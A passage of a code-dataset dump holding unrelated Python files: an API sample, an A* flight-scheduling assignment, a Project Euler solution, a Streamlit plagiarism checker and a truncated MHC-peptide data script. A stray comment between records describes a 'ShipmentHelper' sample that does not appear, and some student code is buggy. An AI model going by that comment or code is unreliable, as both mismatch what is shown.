get_logger('write to file')\n\n    consumer = c.create_consumer(args.topic, args.server)\n    chunks = c.chunks(consumer, args.count)\n\n    for chunk in chunks:\n        write_to_file(chunk, args.file+str(time.time()))\n        logger.info(\"new file created..\")\n","sub_path":"src/kafka_stream/consumer_write_file.py","file_name":"consumer_write_file.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"531240789","text":"from voximplant.apiclient import VoximplantAPI, VoximplantException\nimport pytz\nimport datetime\n\nif __name__ == \"__main__\":\n    voxapi = VoximplantAPI(\"credentials.json\")\n\n    # Get statistics for all queues from the specified date\n\n    # tzinfo must be passed by keyword; positionally this slot is microsecond\n    FROM_DATE = datetime.datetime(2017, 1, 1, 0, 0, 0, tzinfo=pytz.utc)\n    \n    try:\n        res = voxapi.get_acd_queue_statistics(FROM_DATE)\n    except VoximplantException as e:\n        print(\"Error: {}\".format(e.message))\n    else:\n        print(res)\n","sub_path":"samples/get_acd_queue_statistics.py","file_name":"get_acd_queue_statistics.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
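# A hedged usage sketch for the ShipmentHelper sample above (the pricing values
# are assumptions, inferred from the nested provider -> size -> price loops):
#
#     pricing = {"LP": {"S": 1.50, "M": 4.90}, "MR": {"S": 2.00, "M": 3.00}}
#     ShipmentHelper.get_lowest_price(pricing, "S")   # -> 1.5
#     ShipmentHelper.get_package_sizes(pricing)       # -> ['S', 'M']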
+{"seq_id":"320503588","text":"#!/usr/bin/env python3.6\n\nLOCATION = 0\nTIME = 1\nLEGS = 2\n\nfrom aimapython.search import astar_search\nfrom aimapython.search import EightPuzzle\nfrom aimapython.search import Problem\nimport sys\n\n\nclass Legs:\n #profit_list = [] #make some sort of dictionary or tuple?\n #class_list = []\n\n def __init__(self, leg, id):\n self.id = id #is the id needed?\n self.dep_airport = leg[1]\n self.arr_airport = leg[2]\n self.dur = leg[3]\n\n self.profits = { leg[i]:leg[i+1] for i in range(len(leg)) if i >= 4 and i%2 == 0 }\n print(self.profits)\n \"\"\"index = 0\n for fields in leg:\n if index >= 4 and index%2 == 0:\n self.class_list.append(fields[index])\n self.profit_list.append(fields[index+1])\n index=index+1\"\"\"\n\n def get_dur(self):\n return self.dur\n\n def get_arr_airport(self):\n return self.arr_airport\n\n def get_dep_airport(self):\n return self.dep_airport\n\n def get_profit(self, c):\n return self.profits[c]\n\n def get_max_profit(self):\n inverse = [(value, key) for key, value in self.profits.items()]\n return max(inverse)[0]\n\n def get_id(self):\n return self.id\n\n\nclass Airplane:\n\n def __init__(self, plane, id):\n self.id = id\n self.name = plane[1]\n self.c = plane[2]\n\n def get_class(self):\n return self.c\n\n def get_id(self):\n return self.id\n\n def get_name(self):\n return self.name\n\n\nclass ASARProblem(Problem):\n\n def __init__(self, filename):\n #self.initial = # place here the initial state (or None)\n fh = open(filename)\n [A, P, L, C] = self.load(fh)\n\n self.airClasses = {C[i][1] : C[i][2] for i in range(len(C))}\n\n self.airports = {A[i][1]: (A[i][2], A[i][3]) for i in range(len(A))} # verificar closing>opening???\n\n self.legs = [Legs(L[i], i) for i in range(0, len(L))]\n self.planes = [Airplane(P[i], i) for i in range(0, len(P))]\n\n self.n_planes = len(self.planes)\n\n needed_info = [[-1 for p in range(len(P))], [0 for p in range(len(P))], [() for i in range(len(P))]]\n initial = (tuple([l.get_id() for l in self.legs]), tuple(tuple(i) for i in needed_info))\n #initial = state([l.get_id() for l in self.legs], [p.get_location() for p in planes])\n\n Problem.__init__(self, initial)\n\n def actions(self, state):\n # possible actions consist of applying a leg to a given plane\n possible_actions = [[p, l] for p in range(len(self.planes)) for l in state[0]]\n\n for action in possible_actions:\n # pode-se otimizar fazendo pre-processamento\n p = action[0]\n l = action[1]\n s = len(state[1][LEGS][p])\n\n if s == 0:\n pass\n # tem de começar onde o avião está\n else:\n last_leg = int(state[1][LEGS][p][s-1])\n if self.legs[last_leg].get_arr_airport() != self.legs[l].get_dep_airport():\n possible_actions.remove(action)\n continue\n\n # parte a uma hora em que o departure airport já abriu\n \"\"\"apt = self.legs[action[1]].get_dep_airport()\n if self.planes[action[0]].get_time() < self.airports[apt][0]:\n possible_actions.remove(action)\n continue\n \"\"\"\n #chega a uma hora em que o arrival airport já abriu\n \"\"\"apt = self.legs[action[1]].get_arr_airport()\n if self.planes[action[0]].get_time() + self.legs[action[1]].get_dur() < self.airports[apt][0]:\n possible_actions.remove(action)\n continue\n \"\"\"\n # parte a uma hora em que o departure airport ainda não fechou\n apt = self.legs[action[1]].get_dep_airport()\n\n if state[1][TIME][p] > self.airports[apt][1]:\n possible_actions.remove(action)\n continue\n\n #chega a uma hora em que o arrival airport ainda não fechou\n apt = self.legs[action[1]].get_arr_airport()\n if 
state[1][1][p] + self.legs[action[1]].get_dur() > self.airports[apt][1]:\n possible_actions.remove(action)\n continue\n\n return possible_actions\n\n def result(self, state, action):\n print(\"Current state: \", state)\n #print(self.airClasses)\n #new_state = [list(state[0]), [list(state[1][0]), list(state[1][1]), [list(state[1][2][i]) for i in range(len(state[1][2]))]]]\n new_state = [list(state[0]), [list(state[1][0]), list(state[1][1]), [list(state[1][2][0]), list(state[1][2][1])]]]\n print(\"New state: \", new_state)\n\n new_state[0].remove(action[1])\n p = action[0]\n l = action[1]\n new_state[1][0][p] = self.legs[l].get_arr_airport()\n dep = self.legs[l].get_dep_airport()\n arr = self.legs[l].get_arr_airport()\n leg_dur = self.legs[l].get_dur()\n classe = self.planes[p].get_class()\n new_state[1][1][p] = max(new_state[1][1][p] + leg_dur, self.airports[dep][0] + leg_dur, self.airports[arr][0])\n new_state[1][1][p] = new_state[1][1][p] + self.airClasses[classe]\n new_state[1][TIME][p] = new_state[1][TIME][p] + self.airClasses[classe]\n new_state[1][LEGS][p].append(l)\n\n #next_state = tuple(new_state[0]), (tuple(new_state[1][0]), tuple(new_state[1][1]), tuple(tuple(new_state[1][2][i]) for i in range(len(new_state[1][2])) ))\n #needed_info = [[-1 for p in range(len(P))], [0 for p in range(len(P))], [() for i in range(len(P))]]\n #initial = (tuple([l.get_id() for l in self.legs]), tuple(tuple(i) for i in needed_info))\n\n #planes_info = tuple(new_state[1][0]), tuple(new_state[1][1]), tuple(tuple(i) for i in new_state[1][2])\n #planes_info = tuple(new_state[1][0]), tuple(new_state[1][1]), (tuple(new_state[1][2][0]), tuple(new_state[1][2][1]), tuple(new_state[1][2][2]))\n #next_state = (tuple(new_state[0]), planes_info)\n #print(\"Next state: \", next_state)\n return (tuple(new_state[0]), (tuple(new_state[1][0]), tuple(new_state[1][1]), (tuple(new_state[1][2][0]),tuple(new_state[1][2][1]))) )\n\n\n def goal_test(self, state):\n #percorreu todas as legs?\n print(state)\n if state[0] != ():\n return False\n for l in state[1][LEGS]:\n s = len(l)\n\n if s == 0:\n continue\n else:\n first = self.legs[l[0]].get_dep_airport()\n last = self.legs[l[s-1]].get_arr_airport()\n #print(\" initial and final leg: \",l[0], l[s-1])\n if first != last:\n return False\n return True\n\n def path_cost(self, c, state1, action, state2): # path cost g(n)\n profit = self.legs[action[1]].get_profit(self.planes[action[0]].get_class())\n # print(\"profi: \", profit, \"leg \", action[1], \"plane\", self.planes[action[0]].get_class(), \"\\n\")\n return c + 1/profit\n\n def h(self, node): # heuristic function h(n)\n # note: use node.state to access the state\n h = 0\n\n \"\"\"state = node.state\n\n legs = list(state[1][2])\n\n state_list = [list(state[0]), [list(state[1][0]), list(state[1][1]), [legs[i] for i in range(len(legs))]]]\"\"\"\n\n for leg in node.state[0]:\n h = h + 1 / self.legs[leg].get_max_profit()\n #print(leg, self.legs[leg].get_max_profit())\n\n \"\"\"for leg in state_list[0]:\n h = h + 1/self.legs[leg].get_max_profit()\n print(leg, self.legs[leg].get_max_profit())\"\"\"\n\n # print(\" heuristica\",h)\n\n return h\n\n def load(self, fh):\n # note: fh is an opened file object\n # note: self.initial may also be initialized here\n lines = fh.readlines()\n return process(lines)\n\n\n\n def save(self, fh, state):\n i = 0\n profit = 0\n for legs_list in state[1][LEGS]:\n line = \"S \" + self.planes[i].get_name() + \" \"\n for l in legs_list:\n line = line + \" \" + self.legs[l].get_dep_airport() + \" \" + 
self.legs[l].get_arr_airport()\n c = self.planes[i].get_class()\n profit = profit + self.legs[l].get_profit(c)\n line = line + \"\\n\"\n fh.write(line)\n i = i +1\n line = \"P \" + str(profit)\n fh.write(line)\n\n\n\ndef load_problem(filename):\n with open(filename) as fh:\n lines = fh.readlines()\n return lines\n\n\ndef process(lines):\n A=[]\n P=[]\n L=[]\n C=[]\n\n for ln in lines:\n if ln[0] == 'A':\n A.append([s for s in ln.split() ])\n\n if ln[0] == 'P':\n P.append([s for s in ln.split()])\n\n if ln[0] == 'L':\n L.append([s for s in ln.split()])\n\n if ln[0] == 'C':\n C.append([s for s in ln.split()])\n for a in A:\n a[2] = int(a[2])\n a[3] = int(a[3])\n for l in L:\n l[3] = int(l[3])\n l[5] = int(l[5])\n l[7] = int(l[7])\n for c in C:\n c[2] = int(c[2])\n return [A, P, L, C]\n\n\n\ndef main():\n\n if len(sys.argv) > 1:\n fh = open(\"solution.txt\", \"w+\")\n prob = ASARProblem(sys.argv[1])\n node = astar_search(prob)\n prob.save(fh, node.state)\n else:\n print(\"Usage: %s <filename>\" % (sys.argv[0]))\n\n\nmain()\n\n\n\n\n\n\n\"\"\" puzzle = EightPuzzle((1, 2, 3, 4, 5, 6, 0, 7, 8))\n sol = astar_search(puzzle)\n print(\"parent \", sol.parent, \"state \", sol.state, \"action \", sol.action, \"path cost \", sol.path_cost, \"depth \", sol.depth)\n print(\"grandpa\", sol.parent.parent)\"\"\"\n\n\n","sub_path":"project1/funciona2.py","file_name":"funciona2.py","file_ext":"py","file_size_in_byte":9800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"202341153","text":"from math import sqrt\n\ntri = \"\"\"75\n95 64\n17 47 82\n18 35 87 10\n20 04 82 47 65\n19 01 23 75 03 34\n88 02 77 73 07 63 67\n99 65 04 28 06 16 70 92\n41 41 26 56 83 40 80 70 33\n41 48 72 33 47 32 37 16 94 29\n53 71 44 65 25 43 91 52 97 51 14\n70 11 33 28 77 73 17 78 39 68 17 57\n91 71 52 38 17 14 91 43 58 50 27 29 48\n63 66 04 68 89 53 67 30 73 16 69 87 40 31\n04 62 98 27 23 09 70 98 73 93 38 53 60 04 23\"\"\"\n\n\n# 0 -> 1, 2\n# 1 -> 3, 4\n# 2 -> 4, 5\n# 3 -> 6, 7\n# 4 -> 7, 8\n# 5 -> 8, 9\n\n# L + x + 1, L + x + 2\n\n# S = n(n+1)/2 => n^2 + n - 2S = 0 => n = ( -1 +- sqrt(1 + 8S) ) / 2\n\n# L = int((sqrt(8S+1) - 1)/2)\n\n\ndef load_from_string(string):\n L = []\n lines = string.split('\\n')\n for line in lines:\n L += [int(num) for num in line.split(' ')]\n return L\n\ndef get_line_from_index(i):\n return int((sqrt(8*i + 1) - 1) / 2)\n\ndef get_left_child(i):\n return get_line_from_index(i) + i + 1\n\ndef get_right_child(i):\n return get_left_child(i) + 1\n\n# C = L(RP) + RP + 1 = L(C) - 1 + RP + 1 = L(C) + RP ==> RP = C - L(C)\n\ndef right_parent(i):\n line = get_line_from_index(i)\n p = i - line\n if get_line_from_index(p) != (line - 1):\n return None\n return p\n\ndef left_parent(i):\n line = get_line_from_index(i)\n p = i - line - 1\n if p < 0 or get_line_from_index(p) != (line - 1):\n return None\n return p\n\ndef max_paths(L):\n M = [0] * len(L)\n M[0] = L[0]\n\n # fill the triangle at the two extremities\n l = get_left_child(0)\n r = get_right_child(0)\n while r < len(L) and l < len(L):\n M[l] = L[l] + M[right_parent(l)]\n M[r] = L[r] + M[left_parent(r)]\n l = get_left_child(l)\n r = get_right_child(r)\n \n # fill the rest of the triangle\n for i in range(len(L)):\n l = left_parent(i)\n r = right_parent(i)\n if l is not None and r is not None:\n M[i] = L[i] + max(M[l], M[r])\n \n return M\n\ndef test():\n for i in range(10):\n print('Index: {} - LP: {} - RP: {} - LC: {} - RC: {}'.format(i, left_parent(i), right_parent(i), get_left_child(i), 
get_right_child(i)))\n\n\nL = load_from_string(tri)\n\n# test()\n\n\nM = max_paths(L)\n\ndef max_path_to_bottom(L):\n    M = max_paths(L)\n    last_line = get_line_from_index(len(L) - 1)\n    first_of_last_line = last_line * (last_line + 1) // 2\n    m = M[first_of_last_line]\n    for i in range(first_of_last_line, len(L)):\n        if M[i] > m:\n            m = M[i]\n    return m\n\nprint(M)\nprint(max_path_to_bottom(L))","sub_path":"problem18.py","file_name":"problem18.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"383190972","text":"import streamlit as st\nfrom PIL import Image\nimport pytesseract as pt\nfrom textblob import TextBlob\nimport cv2 as cv\nimport numpy as np\nimport re\nimport matplotlib.pyplot as plt\nimport os\nimport base64\nimport pandas as pd\nimport time\nfrom pdf2image import convert_from_path\nimport pdfplumber\nimport docx2txt\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\ndef intro():\n    st.markdown(\"\"\"<h2 style='text-align: left; color: #0e1236;'>Problem Statement</h2>\n    <p style='color: #0e1236;'>Plagiarism is defined as taking the work of others as your own without credit. This definition applies to source-lacking essays and simply claiming ideas as your own. \n    One example of plagiarism is like taking the idea of the theory of relativity as your own, or claiming you wrote a book while it was actually made by another author.</p>\"\"\",\n                unsafe_allow_html=True)\n    st.markdown(\"\"\"<h2 style='text-align: left; color: #0e1236;'>TASK</h2><p style='color: #0e1236;'>\n    Need to Input some files in raw format and then check plagiarism among them</p>\"\"\",\n                unsafe_allow_html=True)\n    st.markdown(\"\"\"<h2 style='text-align: left; color: #0e1236;'>My Approach</h2>\n    <p style='color: #0e1236;'>\n    <ul style='text-align: left; color: #0e1236;'>\n    <li>Create a web Interface using Python</li>\n    <li>Take some input files</li>\n    <li>Extract Text from them using some of the libraries like docx2txt pdfplumber tesseract etc.</li>\n    <li>Compare them using an NLP (Natural Language Processing) or LCS (Longest Common Subsequence) approach</li>\n    <li>Classify texts as:<ul><li>Positive if plagiarism is less than 30%,<li>Negative if plagiarism is greater than 75%,<li>Random otherwise</li></ul>\n    <li>I am using Streamlit as Backend In this Project Which is an open source app framework</li>\n    </ul>\n    </p>\"\"\",\n                unsafe_allow_html=True)\n    st.markdown(\"\"\"<h3 style='text-align: left; color: #0e1236;'>Learn More</h3>\"\"\",\n                unsafe_allow_html=True)\n    if(st.checkbox(\"What is Tesseract\")):\n        st.markdown(\n            \"\"\"<div style='background-color: #FEFEFE;padding-left: 50px;border-radius: 10px;'>\n            <h3 style='text-align: left; color: #0e1236;'>An optical character recognition (OCR) engine</h3>\n            <p style='text-align: left; color: #0e1236;'>Tesseract is an OCR engine with support for unicode and \n            the ability to recognize more than 100 languages out of the box. 
It can be trained to recognize other languages.</p>\n            <p style='text-align: left; color: #0e1236;'>Tesseract is used for text detection on mobile devices, in video, and \n            in Gmail image spam detection.</p>\n            <a href = \"https://tesseract-ocr.github.io/\" style='text-align: left; color:#7870e0;'>\n            Tesseract Documentation\n            </a >\n            </div><p></p>\"\"\", unsafe_allow_html=True)\n    if(st.checkbox(\"Longest Common Subsequence\")):\n        st.markdown(\n            \"\"\"<div style='background-color: #FEFEFE;border-radius: 10px;padding-left: 50px;'>\n            <p style='text-align: left; color: #0e1236;'><span style='font-style: italic;'>LCS Problem Statement:</span> \n            Given two sequences, find the length of longest subsequence present in both of them. A subsequence is a sequence \n            that appears in the same relative order, but not necessarily contiguous. For example, “abc”, “abg”, “bdf”, “aeg”, “acefg”, .. etc are subsequences of “abcdefg”.</p>\n            <p style='text-align: left; color: #0e1236;'>We are using Dynamic programming for this.</p>\n            <a href = \"https://www.geeksforgeeks.org/longest-common-subsequence-dp-4/\" style='text-align: left; color:#7870e0;'>\n            Geeks For Geeks Link\n            </a >\n            </div><p></p>\"\"\",\n            unsafe_allow_html=True)\n    if(st.checkbox(\"Show Code\")):\n        st.markdown(\n            \"\"\"<h2 style='text-align: left; color: #0e1236;'>Longest Common Subsequence Function</h2>\"\"\",\n            unsafe_allow_html=True)\n\n        with st.echo():\n            def longest_common_subsequence(X, Y):\n                m = len(X)\n                n = len(Y)\n\n                L = [[None]*(n+1) for i in range(m+1)]\n\n                for i in range(m+1):\n                    for j in range(n+1):\n                        if i == 0 or j == 0:\n                            L[i][j] = 0\n                        elif X[i-1] == Y[j-1]:\n                            L[i][j] = L[i-1][j-1]+1\n                        else:\n                            L[i][j] = max(L[i-1][j], L[i][j-1])\n\n                return L[m][n]\n\n\ndef Extract(fil):\n    text = \"\"\n    if fil.type == \"text/plain\":\n        text = str(fil.read(), \"utf-8\")\n\n    elif fil.type == \"application/vnd.openxmlformats-officedocument.wordprocessingml.document\":\n        text = docx2txt.process(fil)\n\n    elif fil.type == \"application/pdf\":\n        with pdfplumber.open(fil) as pdf:\n            for j in range(0, len(pdf.pages)):\n                page = pdf.pages[j]\n                text += page.extract_text()\n    else:\n        file_bytes = np.asarray(bytearray(fil.read()), dtype=np.uint8)\n        img = cv.imdecode(file_bytes, cv.IMREAD_COLOR)\n        text = pt.image_to_string(img)\n    text = text.replace('\\n', ' ').replace('\\r', '')\n    return text\n\n\ndef lcs(X, Y):\n    m = len(X)\n    n = len(Y)\n\n    L = [[None]*(n+1) for i in range(m+1)]\n\n    for i in range(m+1):\n        for j in range(n+1):\n            if i == 0 or j == 0:\n                L[i][j] = 0\n            elif X[i-1] == Y[j-1]:\n                L[i][j] = L[i-1][j-1]+1\n            else:\n                L[i][j] = max(L[i-1][j], L[i][j-1])\n\n    return L[m][n]*100/max(m, n)\n
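# A hand-checked illustration of lcs() above (added; not part of the original app):\n#     lcs(\"ABCBDAB\", \"BDCAB\")  # the common subsequence \"BCAB\" has length 4, so this\n#                              # returns 4 * 100 / max(7, 5) = 57.142..., i.e. similarity\n#                              # as a percentage of the longer input\n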
ha=\"right\", fontsize=10,\n rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n for i in range(len(y_labels)):\n for j in range(len(x_labels)):\n if values[i][j] < 0.5:\n text = ax.text(j, i, \"%.2f\" % values[i, j],\n ha=\"center\", va=\"center\", color=\"w\", fontsize=6)\n else:\n text = ax.text(j, i, \"%.2f\" % values[i, j],\n ha=\"center\", va=\"center\", color=\"b\", fontsize=6)\n st.pyplot(fig)\n\n\ndef OTM():\n MAJOR = st.sidebar.file_uploader(\"MAJOR FILE\", type=[\"pdf\", \"txt\", \"docx\"])\n ALL = st.sidebar.file_uploader(\"ALL FILE\", type=[\"pdf\", \"txt\", \"docx\"],\n accept_multiple_files=True)\n\n if MAJOR is not None and ALL is not None:\n key_val = {}\n for i in range(len(ALL)):\n key_val[ALL[i].name] = i\n corpus = [Extract(ALL[key_val[j]]) for j in sorted(key_val.keys())]\n corpus.append(Extract(MAJOR))\n names = [ALL[key_val[j]].name for j in sorted(key_val.keys())]\n vect = TfidfVectorizer(min_df=1, stop_words=\"english\")\n tfidf = vect.fit_transform(corpus)\n pairwise_similarity = tfidf * tfidf.T\n pairwise_similarity = tfidf * tfidf.T\n pairwise_similarity = pairwise_similarity.toarray()\n l = len(ALL)\n # pairwise_similarity = a * b.T\n\n # print(a.toarray()[0])\n # print(b.toarray())\n # text_major = Extract(MAJOR)\n # key_val = {}\n arr = np.zeros((len(ALL), 1))\n # i = int(0)\n # for fil in ALL:\n # text = Extract(fil)\n # key_val[fil.name] = lcs(text_major, text)\n\n for i in range(l):\n arr[i][0] = pairwise_similarity[l][i]\n chart_data = pd.DataFrame(\n arr,\n columns=[\"Plagiarism\"])\n st.bar_chart(chart_data)\n tmp_download_link = download_link(\n chart_data, 'extracted_text.csv', 'Download as csv')\n st.markdown(f\"\"\"<h3 style='\n border-radius: 10px;color: #FFF;background-color:#eb34c9;text-align: center;'>{tmp_download_link}</h3>\"\"\", unsafe_allow_html=True)\n\n\ndef MTM():\n ALL = None\n ALL = st.sidebar.file_uploader(\"ALL FILE's\", type=[\"pdf\", \"txt\", \"docx\"],\n accept_multiple_files=True)\n if ALL:\n key_val = {}\n for i in range(len(ALL)):\n key_val[ALL[i].name] = i\n corpus = [Extract(ALL[key_val[j]]) for j in sorted(key_val.keys())]\n names = [ALL[key_val[j]].name for j in sorted(key_val.keys())]\n vect = TfidfVectorizer(min_df=1, stop_words=\"english\")\n tfidf = vect.fit_transform(corpus)\n pairwise_similarity = tfidf * tfidf.T\n heatmap(names, names, pairwise_similarity.toarray())\n toprint = pd.DataFrame(pairwise_similarity.toarray())\n tmp_download_link = download_link(\n toprint, 'pairwise_similarity.csv', 'Download as csv')\n st.markdown(f\"\"\"<h3 style='\n border-radius: 10px;color: #FFF;background-color:#eb34c9;text-align: center;'>{tmp_download_link}</h3>\"\"\", unsafe_allow_html=True)\n\n\ndef OTO():\n FILE_1 = st.sidebar.file_uploader(\n \"FILE.1\", type=[\"pdf\", \"txt\", \"docx\", \"jpg\", \"png\", \"jpeg\"])\n FILE_2 = st.sidebar.file_uploader(\n \"FILE.2\", type=[\"pdf\", \"txt\", \"docx\", \"jpg\", \"png\", \"jpeg\"])\n cols0 = st.beta_columns(2)\n if FILE_1 and FILE_2:\n texts = [None, None]\n texts[0] = Extract(FILE_1)\n texts[1] = Extract(FILE_2)\n cols0[0].markdown(f\"<pre style='background-color: #FEFEFE;border-radius: 10px;'>{texts[0]}</pre>\",\n unsafe_allow_html=True)\n cols0[1].markdown(f\"<pre style='background-color: #FEFEFE;border-radius: 10px;'>{texts[1]}</pre>\",\n unsafe_allow_html=True)\n percentage = round(lcs(texts[0], texts[1]), 2)\n k = 2\n if percentage > 75:\n k = 1\n if percentage < 45:\n k = 0\n percentage = str(percentage)\n if k == 0:\n st.markdown(\n 
f\"\"\"<div style='background-color: #a0f76a;border-radius: 10px;'>\n <h1 style='color:#0e1236;text-align: center;'>Plagiarism: \n <span style='color:#0e1236;'>{percentage}%</span></h1>\n <h2 style='color:#0e1236;text-align: center;'>These Docs Are Not Copied!</h2>\n </div>\n \"\"\", unsafe_allow_html=True)\n if k == 1:\n st.markdown(\n f\"\"\"<div style='background-color: #f5af98;border-radius: 10px;'>\n <h1 style='color:#0e1236;text-align: center;'>Plagiarism: \n <span style='color:#0e1236;'>{percentage}%</span></h1>\n <h2 style='color:#0e1236;text-align: center;'>These Docs Are Copied!</h2>\n </div>\n \"\"\", unsafe_allow_html=True)\n if k == 2:\n st.markdown(\n f\"\"\"<div style='background-color: #cceaf0;border-radius: 10px;'>\n <h1 style='color:#0e1236;text-align: center;'>Plagiarism: \n <span style='color:#0e1236;'>{percentage}%</span></h1>\n <h2 style='color:#0e1236;text-align: center;'>These Docs Are somewhat similer!</h2>\n </div>\n \"\"\", unsafe_allow_html=True)\n\n\ndef main():\n\n # Defining Title\n st.markdown(\n \"<h1 style='text-align: center;border-radius: 10px;color: #FFF;background-color:#eb34c9;padding-top:30px;padding-bottom:30px;font-size:60px;'>Find Plagiarism</h1>\", unsafe_allow_html=True)\n st.markdown(\n \"\"\"<style>body {background-color: #e6e8dc;margin-left:0;}</style><body></body>\"\"\", unsafe_allow_html=True)\n Comparison_Type = ['intro', 'One-to-Many', 'Many-to-Many', 'One-to-One']\n Comparison = st.selectbox(\"Select Comparison Type\", Comparison_Type)\n if Comparison == Comparison_Type[0]:\n intro()\n if Comparison == Comparison_Type[1]:\n OTM()\n elif Comparison == Comparison_Type[2]:\n MTM()\n else:\n OTO()\n\n\nmain()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"442778185","text":"import argparse\n\nimport numpy as np\n\nDATA_KEYS = [\"Allele\", \"Peptide\", \"MHC\", \"Binding result\"]\n\ndef write_all_2_file(filename, data, size_limit=10):\n \"\"\"\n Write all formatted data to @p filename\n \"\"\"\n with open(filename, \"w\") as f:\n line = \"\"\n for key in DATA_KEYS:\n line += key + \";\"\n f.write(line[:-1] + \"\\n\")\n\n linecount = 0\n for entry in data:\n if linecount >= size_limit and size_limit > 0:\n return\n linecount += 1\n f.write(str(entry[0]) + \";\" + str(entry[1]) + \";\" + str(entry[2]) \\\n + \";\" + str(entry[3]) + \"\\n\")\n\n\ndef write_peplen9_2_file(filename, data, size_limit=10):\n \"\"\"\n Write formatted data with peptide length 9 to @p filename\n \"\"\"\n with open(filename, \"w\") as f:\n line = \"\"\n for key in DATA_KEYS:\n line += key + \";\"\n f.write(line[:-1] + \"\\n\")\n\n linecount = 0\n for entry in data:\n if linecount >= size_limit and size_limit > 0:\n return\n if len(entry[1]) == 9:\n linecount += 1\n f.write(str(entry[0]) + \";\" + str(entry[1]) + \";\" + str(entry[2]) \\\n + \";\" + str(entry[3]) + \"\\n\")\n\n\ndef write_peplen10_2_file(filename, data, size_limit=10):\n \"\"\"\n Write formatted data with peptide length 9 to @p filename\n \"\"\"\n with open(filename, \"w\") as f:\n line = \"\"\n for key in DATA_KEYS:\n line += key + \";\"\n f.write(line[:-1] + \"\\n\")\n\n linecount = 0\n for entry in data:\n if linecount >= size_limit and size_limit > 0:\n return\n if len(entry[1]) == 10:\n linecount += 1\n f.write(str(entry[0]) + \";\" + str(entry[1]) + \";\" + str(entry[2]) \\\n + \";\" + str(entry[3]) + \"\\n\")\n print(\"Wrote \" + str(linecount) + \" 
entries to \" + filename)\n\n\ndef write_A_2_file(filename, data, size_limit=10):\n \"\"\"\n Write formatted data with peptide length 9 to @p filename\n \"\"\"\n with open(filename, \"w\") as f:\n line = \"\"\n for key in DATA_KEYS:\n line += key + \";\"\n f.write(line[:-1] + \"\\n\")\n\n linecount = 0\n for entry in data:\n if linecount >= size_limit and size_limit > 0:\n return\n if 'HLA-A' in entry[0]:\n linecount += 1\n f.write(str(entry[0]) + \";\" + str(entry[1]) + \";\" + str(entry[2]) \\\n + \";\" + str(entry[3]) + \"\\n\")\n print(\"Wrote \" + str(linecount) + \" entries to \" + filename)\n\n\ndef write_B_2_file(filename, data, size_limit=10):\n \"\"\"\n Write formatted data with peptide length 9 to @p filename\n \"\"\"\n with open(filename, \"w\") as f:\n line = \"\"\n for key in DATA_KEYS:\n line += key + \";\"\n f.write(line[:-1] + \"\\n\")\n\n linecount = 0\n for entry in data:\n if linecount >= size_limit and size_limit > 0:\n return\n if 'HLA-B' in entry[0]:\n linecount += 1\n f.write(str(entry[0]) + \";\" + str(entry[1]) + \";\" + str(entry[2]) \\\n + \";\" + str(entry[3]) + \"\\n\")\n print(\"Wrote \" + str(linecount) + \" entries to \" + filename)\n\n\ndef write_C_2_file(filename, data, size_limit=10):\n \"\"\"\n Write formatted data with peptide length 9 to @p filename\n \"\"\"\n with open(filename, \"w\") as f:\n line = \"\"\n for key in DATA_KEYS:\n line += key + \";\"\n f.write(line[:-1] + \"\\n\")\n\n linecount = 0\n for entry in data:\n if linecount >= size_limit and size_limit > 0:\n return\n if 'HLA-C' in entry[0]:\n linecount += 1\n f.write(str(entry[0]) + \";\" + str(entry[1]) + \";\" + str(entry[2]) \\\n + \";\" + str(entry[3]) + \"\\n\")\n print(\"Wrote \" + str(linecount) + \" entries to \" + filename)\n\n\ndef read_data(file):\n \"\"\"\n Read data from file\n \"\"\"\n data = np.genfromtxt(file,\n dtype='str',\n skip_header=True,\n delimiter=',')\n\n return data\n\n\ndef mhc_data(raw_data):\n \"\"\"\n Parse raw MHC data.\n\n returns tuple of lists: (mhc_name_list, mhc_sequence_list)\n \"\"\"\n print(\"Checking MHC data\")\n mhcs = []\n data = []\n temp_data = []\n for d in raw_data:\n temp_data.append(list(d))\n\n raw_data = temp_data\n\n for d in raw_data:\n # entry = list2string(extract_numeric_sequence(d, index=2))\n entry = d[2]\n # Allele name = index 1\n mhcs.append(d[1])\n data.append(entry)\n\n print(\"Size of data = \" + str(len(raw_data)))\n return (mhcs, data)\n\n\ndef peptide_data(raw_data):\n \"\"\"\n Parse raw peptide data.\n\n returns tuple of lists: (mhc_name_list, peptide_sequence_list, boolean_bindings_list)\n \"\"\"\n print(\"Checking Peptide data\")\n mhc_names = []\n data = []\n bindings = []\n temp_data = []\n for d in raw_data:\n temp_data.append(list(d))\n\n raw_data = temp_data\n for d in raw_data:\n entry = d[0]\n # Only keep peptides of length 9 or 10\n if filter_size(entry, 9) or filter_size(entry, 10):\n entry = d[0]\n data.append(entry)\n # Allele name = index 1\n mhc_names.append(d[2])\n # Append if binding is True or False\n bindings.append(int(d[1] == 'True'))\n\n return (mhc_names, data, bindings)\n\n\ndef filter_size(sequence, size):\n \"\"\"\n Only keep sequence of length @p size.\n \"\"\"\n if len(sequence) == size:\n return sequence\n return None\n\n\ndef get_valid_mhc_names(peptides_tuple, mhcs_tuple):\n \"\"\"\n Get list of MHC names that are also used in experiments with peptides.\n \"\"\"\n # Extract MHC names from peptides and mhcs data.\n mhcs_peptides = peptides_tuple[0]\n mhcs_mhcs = mhcs_tuple[0]\n\n inter_set = 
